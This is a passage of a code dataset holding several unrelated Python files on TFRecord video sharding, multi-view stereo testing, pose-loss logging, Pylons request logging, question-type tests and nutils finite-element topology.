_bytes_feature_list(frames_byte),\n \"flow_xs\": _bytes_feature_list(flow_xs_byte),\n \"flow_ys\": _bytes_feature_list(flow_ys_byte)\n })\n )\n return example\n\n\ndef process_batch_files(thread_index, ranges, name, num_shards, video_list, dict):\n '''Processes and saves a subset of video as TFRecord files in one thread.\n Args:\n thread_index: 线程序号\n ranges: 将数���集分成了几个部分,A list of pairs\n name: Unique identifier specifying the dataset\n video_dir:视频数据所在的文件夹\n label_dir:文本数据所在的文件夹\n vocab:A Vocabulary object\n num_shards: 数据集最终分成几个TFRecord\n '''\n num_threads = len(ranges)\n assert not num_shards % num_threads\n num_shards_per_batch = int(num_shards / num_threads)\n\n shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1],\n num_shards_per_batch + 1).astype(int)\n num_video_in_thread = ranges[thread_index][1] - ranges[thread_index][0]\n\n counter = 0\n for s in range(num_shards_per_batch):\n shard = thread_index * num_shards_per_batch + s\n output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)\n output_file = os.path.join(FLAGS.output_dir, output_filename)\n writer = tf.python_io.TFRecordWriter(output_file)\n\n shard_counter = 0\n video_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)\n for i in video_in_shard:\n video = video_list[i]\n sequence_example = _to_sequence_example(video, dict)\n if sequence_example is not None:\n writer.write(sequence_example.SerializeToString())\n shard_counter += 1\n counter += 1\n\n if not counter % 1000:\n print(\"%s [thread %d]: Processed %d of %d items in thread batch.\" %\n (datetime.now(), thread_index, counter, num_video_in_thread))\n sys.stdout.flush()\n\n writer.close()\n print(\"%s [thread %d]: Wrote %d video-label pairs to %s\" %\n (datetime.now(), thread_index, shard_counter, output_file))\n sys.stdout.flush()\n shard_counter = 0\n print(\"%s [thread %d]: Wrote %d video-label pairs to %d shards.\" %\n (datetime.now(), thread_index, counter, num_shards_per_batch))\n sys.stdout.flush()\n\n\ndef process_dataset(name, dataset_list, num_shards, dict):\n '''Process a complete data_process set and save it as a TFRecord.\n Args:\n name: 数据集的名称.\n video_dir: 数据集视频所在文件夹.\n label_dir: 标签所在的文件夹.\n vocab: A Vocabulary object.\n '''\n\n f = open(dataset_list, 'r')\n video_list = f.readlines()\n f.close()\n random.seed(1117)\n random.shuffle(video_list)\n\n num_threads = min(num_shards, FLAGS.num_threads)\n spacing = np.linspace(0, len(video_list), num_threads + 1).astype(int)\n ranges = []\n threads = []\n for i in range(len(spacing) - 1):\n ranges.append([spacing[i], spacing[i + 1]])\n\n coord = tf.train.Coordinator()\n\n print('Launching %d threads for spacing: %s' % (num_threads, ranges))\n for thread_index in range(len(ranges)):\n args = (thread_index, ranges, name, num_shards, video_list, dict)\n t = threading.Thread(target=process_batch_files, args=args)\n t.start()\n threads.append(t)\n\n coord.join(threads)\n print('%s: Finished processing all %d video-caption pairs in data_process set \"%s\".' %\n (datetime.now(), len(video_list), name))\n\n\ndef main(unused_argv):\n def _is_valid_num_shards(num_shards):\n \"\"\"Returns True if num_shards is compatible with FLAGS.num_threads.\"\"\"\n return num_shards < FLAGS.num_threads or not num_shards % FLAGS.num_threads\n\n assert _is_valid_num_shards(FLAGS.train_shards), (\n '''Please make the FALGS.num_threads commensurate with FLAGS.train_shards''')\n\n assert _is_valid_num_shards(FLAGS.val_shards), (\n \"Please make the FLAGS.num_threads commensurate with FLAGS.val_shards\")\n\n # dict = get_label(FLAGS.label_file)\n dict = None\n process_dataset('train', FLAGS.train_list, FLAGS.train_shards, dict)\n process_dataset('val', FLAGS.val_list, FLAGS.val_shards, dict)\n\n\nif __name__ == '__main__':\n tf.app.run()","sub_path":"data_process/to_tfrecord.py","file_name":"to_tfrecord.py","file_ext":"py","file_size_in_byte":8383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"54769540","text":"import cv2\nimport torch\nimport os\n\nfrom torch import nn\nimport numpy as np\nimport fastmvsnet.utils.io as io\nfrom fastmvsnet.model import build_pointmvsnet as build_model, FastMVSNet\nfrom torch.utils.data import Dataset, DataLoader\n\n\nclass testDataset(Dataset):\n # mean = torch.tensor([1.97145182, -1.52387525, 651.07223895])\n # std = torch.tensor([84.45612252, 93.22252387, 80.08551226])\n\n def __init__(self, height, width, rootdir, num_view, interval_scale=None, num_virtual_plane=None):\n self.rootdir = rootdir\n self.num_view = num_view\n self.interval_scale = interval_scale\n self.num_virtual_plane = num_virtual_plane\n self.pathlist = self._load_dataset(num_view)\n\n self.height = height\n self.width = width\n\n def __getitem__(self, index):\n path = self.pathlist[index]\n images = []\n cams = []\n data\n for view in range(self.num_view):\n try:\n image = cv2.imread(path[\"image_file\"])\n cam = io.load_cam_dtu(open(path[\"cam_file\"]),\n self.num_virtual_plane, self.interval_scale)\n images.append(image)\n cams.append(cam)\n except:\n print(path +\"Wrong\")\n img_list = np.stack(images, axis = 0)\n cams_list = np.stack(cams,axis = 0)\n img_list = torch.tensor(img_list).permute(0, 3, 1, 2).float()\n cams_list = torch.tensor(cams_list).float()\n return {\n images:img_list,\n cams:cams_list\n }\n\n def __len__(self):\n return len(self.paths) # 只有1(实验只有一组,按照同种光照条件)\n\n def _load_dataset(self, num_view):\n pathlist = []\n path = {}\n image_file=[]\n cam_file=[]\n depth_file=[]\n image_folder = self.root_dir + \"/Rectified/\"\n cam_folder = self.root_dir + \"/Cameras/\"\n depth_folder = self.root_dir + \"/Depths/\"\n for viewnum in num_view:\n image_file.append(image_folder + \"/{:02d}.jpg\".format(viewnum))\n cam_file.append(cam_folder + \"/{:02d}.jpg\".format(viewnum))\n depth_file.append(depth_folder + \"/{:02d}.jpg\".format(viewnum))\n\n path[\"image_file\"] = image_file\n path[\"cam_file\"] = cam_file\n path[\"depth_file\"] = depth_file\n pathlist.append(path)\n\n return pathlist\n\n\n\nif __name__ == \"main\":\n root_path = \"E:\\dataset\\dtu-test-1200\\myutest\"\n dataset = testDataset()\n net = FastMVSNet(\n img_base_channels=8,\n vol_base_channels=8,\n flow_channels=8,\n )\n model = nn.DataParallel(net).cuda()\n model.load_state_dict(\"D:\\srccode\\FastMVSNet\\outputs\\pretrained.pth\")\n with torch.no_grad():\n for i, data in enumerate(dataset):\n {k: v.cuda(non_blocking=True) for k, v in data.items() if isinstance(v, torch.Tensor)}\n preds = model(data, 1, inter_scales=4.24, isGN=True, isTest=True)\n init_depth_map = preds[\"coarse_depth_map\"].cpu().numpy()[0, 0]\n init_prob_map = preds[\"coarse_prob_map\"].cpu().numpy()[0, 0]\n io.write_pfm(\"./init_depth_map.pfm\", init_depth_map)\n io.write_pfm(\"./init_prob_map.pfm\", init_prob_map)\n interval_list = np.array([-2.0, -1.0, 0.0, 1.0, 2.0])\n interval_list = np.reshape(interval_list, [1, 1, -1])\n for i, k in enumerate(preds.keys()):\n if \"flow\" in k:\n if \"prob\" in k:\n out_flow_prob_map = preds[k][0].cpu().permute(1, 2, 0).numpy()\n num_interval = out_flow_prob_map.shape[-1]\n assert num_interval == interval_list.size\n pred_interval = np.sum(out_flow_prob_map * interval_list, axis=-1) + 2.0\n pred_floor = np.floor(pred_interval).astype(np.int)[..., np.newaxis]\n pred_ceil = pred_floor + 1\n pred_ceil = np.clip(pred_ceil, 0, num_interval - 1)\n pred_floor = np.clip(pred_floor, 0, num_interval - 1)\n prob_height, prob_width = pred_floor.shape[:2]\n prob_height_ind = np.tile(np.reshape(np.arange(prob_height), [-1, 1, 1]), [1, prob_width, 1])\n prob_width_ind = np.tile(np.reshape(np.arange(prob_width), [1, -1, 1]), [prob_height, 1, 1])\n\n floor_prob = np.squeeze(out_flow_prob_map[prob_height_ind, prob_width_ind, pred_floor], -1)\n ceil_prob = np.squeeze(out_flow_prob_map[prob_height_ind, prob_width_ind, pred_ceil], -1)\n flow_prob = floor_prob + ceil_prob\n io.write_pfm(\"./flow_prob.pfm\",flow_prob)","sub_path":"fastmvsnet/utils/testDataset.py","file_name":"testDataset.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"610968613","text":"import numpy\nimport os\nimport datetime\nimport numpy as np\nimport pickle\n\n\ndef prep_pred_file(params):\n f_dir=params[\"wd\"]+\"/pred/\";\n if not os.path.exists(f_dir):\n os.makedirs(f_dir)\n f_dir=params[\"wd\"]+\"/pred/\"+params[\"model\"];\n if not os.path.exists(f_dir):\n os.makedirs(f_dir)\n map( os.unlink, (os.path.join( f_dir,f) for f in os.listdir(f_dir)) )\n\ndef write_pred(est,bindex,G_list,params):\n batch_size=est.shape[0]\n seq_length=est.shape[1]\n s_index=params[\"batch_size\"]*bindex*seq_length\n f_dir=params[\"wd\"]+\"/pred/\"+params[\"model\"]+\"/\"\n for b in range(batch_size):\n for s in range(seq_length):\n diff_vec=est[b][s]*2\n vec_str = ' '.join(['%.6f' % num for num in diff_vec])\n p_file=f_dir+os.path.basename(G_list[s_index])\n with open(p_file, \"a\") as p:\n p.write(vec_str)\n s_index+=1\n\n\ndef get_loss_tf(gt,est):\n batch_seq=gt.shape[0]\n loss=0\n for b in range(batch_seq):\n diff_vec=np.abs(gt[b].reshape(14,3) - est[b].reshape(14,3))*2 #13*3\n sq_m=np.sqrt(np.sum(diff_vec**2,axis=1))\n loss +=np.nanmean(sq_m)\n loss/=(batch_seq)\n return (loss)\n\ndef get_loss(gt,est):\n batch_size=gt.shape[0]\n seq_length=gt.shape[1]\n loss=0\n for b in range(batch_size):\n for s in range(seq_length):\n diff_vec=np.abs(gt[b][s].reshape(14,3) - est[b][s].reshape(14,3))*2 #13*3\n sq_m=np.sqrt(np.sum(diff_vec**2,axis=1))\n loss +=np.nanmean(sq_m)\n loss/=(seq_length*batch_size)\n return (loss)\n\ndef get_loss_bb(gt,est):\n sf=\"/home/coskun/PycharmProjects/RNNPose21/daya/blanket.txt\"\n batch_size=gt.shape[0]\n seq_length=gt.shape[1]\n loss=0\n loss_list=[]\n seq_list=[]\n b_seq_list=[]\n with open(sf,\"a\") as f_handle:\n for b in range(batch_size):\n seq_los=[0]*seq_length\n for s in range(seq_length):\n diff_vec=np.abs(gt[b][s].reshape(14,3) - est[b][s].reshape(14,3))*2 #14,3\n val=np.sqrt(np.sum(diff_vec**2,axis=1))\n for i in range(14):\n f=val[i]\n f_handle.write(\"%f\"%(f))\n if(i<13):\n f_handle.write(\";\")\n f_handle.write('\\n')\n b_l=np.nanmean(np.sqrt(np.sum(diff_vec**2,axis=1)))\n loss_list.append(b_l)\n seq_los[s]=b_l\n loss +=np.nanmean(np.sqrt(np.sum(diff_vec**2,axis=1)))\n b_seq_list.append(seq_los)\n seq_list=np.mean(b_seq_list,axis=0)\n loss/=(seq_length*batch_size)\n return (loss,loss_list,seq_list)\n\n\ndef start_log(params):\n log_file=params[\"log_file\"]\n create_file(log_file)\n\n ds= get_time()\n\n log_write(\"Run Id: %s\"%(params['rn_id']),params)\n log_write(\"Deployment notes: %s\"%(params['notes']),params)\n log_write(\"Running mode: %s\"%(params['run_mode']),params)\n log_write(\"Running model: %s\"%(params['model']),params)\n log_write(\"Batch size: %s\"%(params['batch_size']),params)\n log_write(\"Sequence size: %s\"%(params['seq_length']),params)\n\n log_write(\"Starting Time:%s\"%(ds),params)\n log_write(\"size of training data:%f\"%(params[\"len_train\"]),params)\n log_write(\"size of test data:%f\"%(params[\"len_test\"]),params)\n\ndef get_time():\n return str(datetime.datetime.now().time()).replace(\":\",\"-\").replace(\".\",\"-\")\n\ndef create_file(log_file):\n log_dir= os.path.dirname(log_file)\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n if(os.path.isfile(log_file)):\n with open(log_file, \"w\"):\n pass\n else:\n os.mknod(log_file)\n\ndef log_to_file(str,params):\n with open(params[\"log_file\"], \"a\") as log:\n log.write(str)\n\ndef log_write(str,params):\n print(str)\n ds= get_time()\n str=ds+\" | \"+str+\"\\n\"\n log_to_file(str,params)\n\ndef log_read(mode,params):\n wd=params[\"wd\"]\n filename=params['log_file']\n with open(wd+\"/logs/\"+filename) as file:\n data = file.read()\n lines = data.split(\"\\n\")\n i=0\n list=[]\n for line in lines:\n if mode+\"-->\" in line:\n epoch=0\n error=0.\n sl=line.split(\"|\")\n for s in sl:\n if \"epoch\" in s:\n epoch=int(s.strip().split(\" \")[2])\n if \"error\" in s:\n error=float(s.strip().split(\" \")[1])\n list.append((epoch,error))\n #numpy.array([[epoch,error] for (epoch,error) in list_val])[:,1] #all error\n return list\n\ndef log_read_train(params):\n wd=params[\"wd\"]\n mode=\"TRAIN\"\n filename=params['log_file']\n with open(wd+\"/logs/\"+filename) as file:\n data = file.read()\n lines = data.split(\"\\n\")\n i=0\n\n list=[]\n for line in lines:\n if mode+\"-->\" in line:\n epoch=0\n batch_index=0\n error=0.\n sl=line.split(\"|\")\n for s in sl:\n if \"epoch\" in s:\n epoch=int(s.strip().split(\" \")[2])\n if \"error\" in s:\n error=float(s.strip().split(\" \")[1])\n if \"minibatch\" in s:\n batch_index=int(s.strip().split(\" \")[1].split(\"/\")[0])\n list.append((epoch,batch_index,error))\n #numpy.array([[b, c, d] for (b, c, d) in list_val if b==1 ])[:,2] #first epoch all error\n return list","sub_path":"helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"252856336","text":"\"\"\"Logging functions for Pylons applications.\n\"\"\"\nimport logging\n\nfrom webob import Request, Response\n\n__all__ = [\"TransLogger\", \"no_error_pages\"]\n\nclass TransLogger(object):\n \"\"\"Based on ``paste.translogger`` but more flexible.\n\n WARNING: Not compatible with interactive traceback due to unknown bug.\n Not recommended for use at this time.\n\n Logs requests in a compact format useful for development debugging.\n\n ``app`` is the WSGI application to be wrapped.\n ``logger_name`` is the Python logger to use. Messages will be logged at\n priority INFO.\n ``filter_func`` is a function that takes the WSGI environ and returns\n true if the request should be logged or false if not. The default\n value ``None`` logs all request.\n\n No return value.\n \"\"\"\n def __init__(self, app, logger_name=\"access\", filter_func=None):\n self.app = app\n self.filter_func = filter_func\n self.log_func = logging.getLogger(logger_name).info\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n response = request.get_response(self.app) # Call WSGI application.\n if (not self.filter_func) or self.filter_func(environ):\n status = response.status_int\n url = request.path_info\n if request.query_string:\n url = \"%s?%s\" % (request.path_info, request.query_string)\n else:\n url = request.path_info\n username = environ.get(\"REMOTE_USER\")\n if username:\n user_info = \" (%s)\" % username\n else:\n user_info = \"\"\n format = \"%s %s [%s]%s\"\n self.log_func(format, status, url, request.method, user_info)\n return response(environ, start_response)\n\n\n#### Filter functions for use with TransLogger ####\n\ndef no_error_pages(environ):\n \"\"\"TransLogger filter func to suppress error pages\n\n Return False if routing variable \"controller\" is present and contains the\n value \"error\".\n \"\"\"\n controller = environ[\"wsgiorg.routing_args\"][1].get(\"controller\")\n return controller != \"error\"\n\n","sub_path":"third_party_lib/hazpy/lib/hazpy/pylons/logging_util.py","file_name":"logging_util.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"150687083","text":"import pandas as pd\nfrom ipa.text import Text\n\nfrom ipa.get_questiontype import get_questiontype\n\n\ndef test_questiontypes():\n path_to_train_data = \"c:/users/sande/documents/taglayer/iwt_project/data\" \\\n \"/raw/questions_question_type.csv\"\n df = pd.read_csv(path_to_train_data, engine=\"python\", delimiter=';',\n dtype=str)\n df.columns = ['question', 'question_type']\n\n correct = 0\n for question, question_type in zip(df[\"question\"], df[\"question_type\"]):\n question = Text(question, \"en\")\n question.preprocess()\n predicted_type = get_questiontype(question)\n\n if predicted_type == question_type:\n correct += 1\n else:\n print(question.raw, predicted_type, question_type)\n\n accuracy = correct / len(df[\"question\"])\n\n print(\"Accuracy:\", accuracy)\n assert accuracy > 0.99\n\n\ntest_questiontypes()\n","sub_path":"test_qtype.py","file_name":"test_qtype.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433744889","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nThe topology module defines the topology objects, notably the\n:class:`StructuredTopology`. Maintaining strict separation of topological and\ngeometrical information, the topology represents a set of elements and their\ninterconnectivity, boundaries, refinements, subtopologies etc, but not their\npositioning in physical space. The dimension of the topology represents the\ndimension of its elements, not that of the the space they are embedded in.\n\nThe primary role of topologies is to form a domain for :mod:`nutils.function`\nobjects, like the geometry function and function bases for analysis, as well as\nprovide tools for their construction. It also offers methods for integration and\nsampling, thus providing a high level interface to operations otherwise written\nout in element loops. For lower level operations topologies can be used as\n:mod:`nutils.element` iterators.\n\"\"\"\n\nfrom . import element, function, evaluable, util, parallel, numeric, cache, transform, transformseq, warnings, matrix, types, points, sparse\nfrom .sample import Sample\nfrom .elementseq import References\nfrom .pointsseq import PointsSequence\nimport numpy, functools, collections.abc, itertools, functools, operator, numbers, pathlib, abc, treelog as log\n_ = numpy.newaxis\n\n_identity = lambda x: x\n\nclass Topology(types.Singleton):\n 'topology base class'\n\n __slots__ = 'references', 'transforms', 'opposites', 'ndims'\n __cache__ = 'border_transforms', 'boundary', 'interfaces'\n\n @types.apply_annotations\n def __init__(self, references:types.strict[References], transforms:transformseq.stricttransforms, opposites:transformseq.stricttransforms):\n assert references.ndims == opposites.fromdims == transforms.fromdims\n assert len(references) == len(transforms) == len(opposites)\n self.references = references\n self.transforms = transforms\n self.opposites = opposites\n self.ndims = transforms.fromdims\n super().__init__()\n\n def __str__(self):\n 'string representation'\n\n return '{}(#{})'.format(self.__class__.__name__, len(self))\n\n def __len__(self):\n return len(self.references)\n\n def getitem(self, item):\n return EmptyTopology(self.ndims)\n\n def __getitem__(self, item):\n if numeric.isintarray(item):\n item = types.frozenarray(item)\n return Topology(self.references[item], self.transforms[item], self.opposites[item])\n if not isinstance(item, tuple):\n item = item,\n if all(it in (...,slice(None)) for it in item):\n return self\n topo = self.getitem(item) if len(item) != 1 or not isinstance(item[0],str) \\\n else functools.reduce(operator.or_, map(self.getitem, item[0].split(',')), EmptyTopology(self.ndims))\n if not topo:\n raise KeyError(item)\n return topo\n\n def __invert__(self):\n return OppositeTopology(self)\n\n def __or__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other if not self \\\n else self if not other \\\n else NotImplemented if isinstance(other, UnionTopology) \\\n else UnionTopology((self,other))\n\n __ror__ = lambda self, other: self.__or__(other)\n\n def __and__(self, other):\n keep_self = numpy.array(list(map(other.transforms.contains_with_tail, self.transforms)), dtype=bool)\n if keep_self.all():\n return self\n keep_other = numpy.array(list(map(self.transforms.contains_with_tail, other.transforms)), dtype=bool)\n if keep_other.all():\n return other\n ind_self = types.frozenarray(keep_self.nonzero()[0], copy=False)\n ind_other = types.frozenarray([i for i, trans in enumerate(other.transforms) if keep_other[i] and not self.transforms.contains(trans)], dtype=int)\n # The last condition is to avoid duplicate elements. Note that we could\n # have reused the result of an earlier lookup to avoid a new (using index\n # instead of contains) but we choose to trade some speed for simplicity.\n references = self.references.take(ind_self).chain(other.references.take(ind_other))\n transforms = transformseq.chain([self.transforms[ind_self], other.transforms[ind_other]], self.ndims)\n opposites = transformseq.chain([self.opposites[ind_self], other.opposites[ind_other]], self.ndims)\n return Topology(references, transforms, opposites)\n\n __rand__ = lambda self, other: self.__and__(other)\n\n def __add__(self, other):\n return self | other\n\n def __sub__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other.__rsub__(self)\n\n def __rsub__(self, other):\n assert isinstance(other, Topology) and other.ndims == self.ndims\n return other - other.subset(self, newboundary=getattr(self,'boundary',None))\n\n def __mul__(self, other):\n return ProductTopology(self, other)\n\n @property\n def border_transforms(self):\n indices = set()\n for btrans in self.boundary.transforms:\n try:\n ielem, tail = self.transforms.index_with_tail(btrans)\n except ValueError:\n pass\n else:\n indices.add(ielem)\n return self.transforms[numpy.array(sorted(indices), dtype=int)]\n\n @property\n def refine_iter(self):\n topo = self\n while True:\n yield topo\n topo = topo.refined\n\n @property\n def _index_coords(self):\n index = function.transforms_index(self.transforms)\n coords = function.transforms_coords(self.transforms, self.ndims)\n return index, coords\n\n @property\n def f_index(self):\n '''The evaluable index of the element in this topology.'''\n\n return self._index_coords[0]\n\n @property\n def f_coords(self):\n '''The evaluable element local coordinates.'''\n\n return self._index_coords[1]\n\n def basis(self, name, *args, **kwargs):\n '''\n Create a basis.\n '''\n if self.ndims == 0:\n return function.PlainBasis([[1]], [[0]], 1, self.f_index, self.f_coords)\n split = name.split('-', 1)\n if len(split) == 2 and split[0] in ('h', 'th'):\n name = split[1] # default to non-hierarchical bases\n if split[0] == 'th':\n kwargs.pop('truncation_tolerance', None)\n f = getattr(self, 'basis_' + name)\n return f(*args, **kwargs)\n\n def sample(self, ischeme, degree):\n 'Create sample.'\n\n points = PointsSequence.from_iter((ischeme(reference, degree) for reference in self.references), self.ndims) if callable(ischeme) \\\n else self.references.getpoints(ischeme, degree)\n transforms = self.transforms,\n if len(self.transforms) == 0 or self.opposites != self.transforms:\n transforms += self.opposites,\n return Sample.new(transforms, points)\n\n @util.single_or_multiple\n def integrate_elementwise(self, funcs, *, degree, asfunction=False, ischeme='gauss', arguments=None):\n 'element-wise integration'\n\n retvals = [sparse.toarray(retval) for retval in self.sample(ischeme, degree).integrate_sparse(\n [function.kronecker(func, pos=self.f_index, length=len(self), axis=0) for func in funcs], arguments=arguments)]\n if asfunction:\n return [function.Elemwise(retval, self.f_index, dtype=float) for retval in retvals]\n else:\n return retvals\n\n @util.single_or_multiple\n def elem_mean(self, funcs, geometry=None, ischeme='gauss', degree=None, **kwargs):\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n funcs = (1,)+funcs\n if geometry is not None:\n funcs = [func * function.J(geometry, self.ndims) for func in funcs]\n area, *integrals = self.integrate_elementwise(funcs, ischeme=ischeme, degree=degree, **kwargs)\n return [integral / area[(slice(None),)+(_,)*(integral.ndim-1)] for integral in integrals]\n\n @util.single_or_multiple\n def integrate(self, funcs, ischeme='gauss', degree=None, edit=None, *, arguments=None, title='integrate'):\n 'integrate functions'\n\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n if edit is not None:\n funcs = [edit(func) for func in funcs]\n return self.sample(ischeme, degree).integrate(funcs, **arguments or {})\n\n def integral(self, func, ischeme='gauss', degree=None, edit=None):\n 'integral'\n\n ischeme, degree = element.parse_legacy_ischeme(ischeme if degree is None else ischeme + str(degree))\n if edit is not None:\n funcs = edit(func)\n return self.sample(ischeme, degree).integral(func)\n\n def projection(self, fun, onto, geometry, **kwargs):\n 'project and return as function'\n\n weights = self.project(fun, onto, geometry, **kwargs)\n return onto.dot(weights)\n\n @log.withcontext\n def project(self, fun, onto, geometry, ischeme='gauss', degree=None, droptol=1e-12, exact_boundaries=False, constrain=None, verify=None, ptype='lsqr', edit=None, *, arguments=None, **solverargs):\n 'L2 projection of function onto function space'\n\n log.debug('projection type:', ptype)\n\n if degree is not None:\n ischeme += str(degree)\n if constrain is None:\n constrain = util.NanVec(onto.shape[0])\n else:\n constrain = constrain.copy()\n if exact_boundaries:\n constrain |= self.boundary.project(fun, onto, geometry, constrain=constrain, ischeme=ischeme, droptol=droptol, ptype=ptype, edit=edit, arguments=arguments)\n assert isinstance(constrain, util.NanVec)\n assert constrain.shape == onto.shape[:1]\n\n avg_error = None # setting this depends on projection type\n\n if ptype == 'lsqr':\n assert ischeme is not None, 'please specify an integration scheme for lsqr-projection'\n fun2 = function.asarray(fun)**2\n if len(onto.shape) == 1:\n Afun = function.outer(onto)\n bfun = onto * fun\n elif len(onto.shape) == 2:\n Afun = function.outer(onto).sum(2)\n bfun = function.sum(onto * fun, -1)\n if fun2.ndim:\n fun2 = fun2.sum(-1)\n else:\n raise Exception\n assert fun2.ndim == 0\n J = function.J(geometry, self.ndims)\n A, b, f2, area = self.integrate([Afun*J,bfun*J,fun2*J,J], ischeme=ischeme, edit=edit, arguments=arguments)\n N = A.rowsupp(droptol)\n if numpy.equal(b, 0).all():\n constrain[~constrain.where&N] = 0\n avg_error = 0.\n else:\n solvecons = constrain.copy()\n solvecons[~(constrain.where|N)] = 0\n u = A.solve(b, constrain=solvecons, **solverargs)\n constrain[N] = u[N]\n err2 = f2 - numpy.dot(2 * b - A @ u, u) # can be negative ~zero due to rounding errors\n avg_error = numpy.sqrt(err2) / area if err2 > 0 else 0\n\n elif ptype == 'convolute':\n assert ischeme is not None, 'please specify an integration scheme for convolute-projection'\n if len(onto.shape) == 1:\n ufun = onto * fun\n afun = onto\n elif len(onto.shape) == 2:\n ufun = function.sum(onto * fun, axis=-1)\n afun = function.norm2(onto)\n else:\n raise Exception\n J = function.J(geometry, self.ndims)\n u, scale = self.integrate([ufun*J, afun*J], ischeme=ischeme, edit=edit, arguments=arguments)\n N = ~constrain.where & (scale > droptol)\n constrain[N] = u[N] / scale[N]\n\n elif ptype == 'nodal':\n\n ## data = evaluable.Tuple([fun, onto])\n ## F = W = 0\n ## for elem in self:\n ## f, w = data(elem, 'bezier2')\n ## W += w.sum(axis=-1).sum(axis=0)\n ## F += numeric.contract(f[:,_,:], w, axis=[0,2])\n ## I = (W!=0)\n\n F = numpy.zeros(onto.shape[0])\n W = numpy.zeros(onto.shape[0])\n I = numpy.zeros(onto.shape[0], dtype=bool)\n fun = function.asarray(fun).prepare_eval(ndims=self.ndims)\n data = evaluable.Tuple(evaluable.Tuple([fun, onto_f.simplified, evaluable.Tuple(onto_ind)]) for onto_ind, onto_f in evaluable.blocks(onto.prepare_eval(ndims=self.ndims)))\n for ref, trans, opp in zip(self.references, self.transforms, self.opposites):\n ipoints = ref.getpoints('bezier2')\n for fun_, onto_f_, onto_ind_ in data.eval(_transforms=(trans, opp), _points=ipoints, **arguments or {}):\n onto_f_ = onto_f_.swapaxes(0,1) # -> dof axis, point axis, ...\n indfun_ = fun_[(slice(None),)+numpy.ix_(*onto_ind_[1:])]\n assert onto_f_.shape[0] == len(onto_ind_[0])\n assert onto_f_.shape[1:] == indfun_.shape\n W[onto_ind_[0]] += onto_f_.reshape(onto_f_.shape[0],-1).sum(1)\n F[onto_ind_[0]] += (onto_f_ * indfun_).reshape(onto_f_.shape[0],-1).sum(1)\n I[onto_ind_[0]] = True\n\n I[constrain.where] = False\n constrain[I] = F[I] / W[I]\n\n else:\n raise Exception('invalid projection {!r}'.format(ptype))\n\n numcons = constrain.where.sum()\n info = 'constrained {}/{} dofs'.format(numcons, constrain.size)\n if avg_error is not None:\n info += ', error {:.2e}/area'.format(avg_error)\n log.info(info)\n if verify is not None:\n assert numcons == verify, 'number of constraints does not meet expectation: {} != {}'.format(numcons, verify)\n\n return constrain\n\n def refined_by(self, refine):\n 'create refined space by refining dofs in existing one'\n\n return HierarchicalTopology(self, [numpy.arange(len(self))]).refined_by(refine)\n\n @property\n def refined(self):\n return RefinedTopology(self)\n\n def refine(self, n):\n 'refine entire topology n times'\n\n if numpy.iterable(n):\n assert len(n) == self.ndims\n assert all(ni == n[0] for ni in n)\n n = n[0]\n return self if n <= 0 else self.refined.refine(n-1)\n\n def trim(self, levelset, maxrefine, ndivisions=8, name='trimmed', leveltopo=None, *, arguments=None):\n 'trim element along levelset'\n\n if arguments is None:\n arguments = {}\n\n levelset = levelset.prepare_eval(ndims=self.ndims).optimized_for_numpy\n refs = []\n if leveltopo is None:\n with log.iter.percentage('trimming', self.references, self.transforms, self.opposites) as items:\n for ref, trans, opp in items:\n levels = levelset.eval(_transforms=(trans, opp), _points=ref.getpoints('vertex', maxrefine), **arguments)\n refs.append(ref.trim(levels, maxrefine=maxrefine, ndivisions=ndivisions))\n else:\n log.info('collecting leveltopo elements')\n bins = [set() for ielem in range(len(self))]\n for trans in leveltopo.transforms:\n ielem, tail = self.transforms.index_with_tail(trans)\n bins[ielem].add(tail)\n fcache = cache.WrapperCache()\n with log.iter.percentage('trimming', self.references, self.transforms, bins) as items:\n for ref, trans, ctransforms in items:\n levels = numpy.empty(ref.nvertices_by_level(maxrefine))\n cover = list(fcache[ref.vertex_cover](frozenset(ctransforms), maxrefine))\n # confirm cover and greedily optimize order\n mask = numpy.ones(len(levels), dtype=bool)\n while mask.any():\n imax = numpy.argmax([mask[indices].sum() for tail, points, indices in cover])\n tail, points, indices = cover.pop(imax)\n levels[indices] = levelset.eval(_transforms=(trans + tail,), _points=points, **arguments)\n mask[indices] = False\n refs.append(ref.trim(levels, maxrefine=maxrefine, ndivisions=ndivisions))\n log.debug('cache', fcache.stats)\n return SubsetTopology(self, refs, 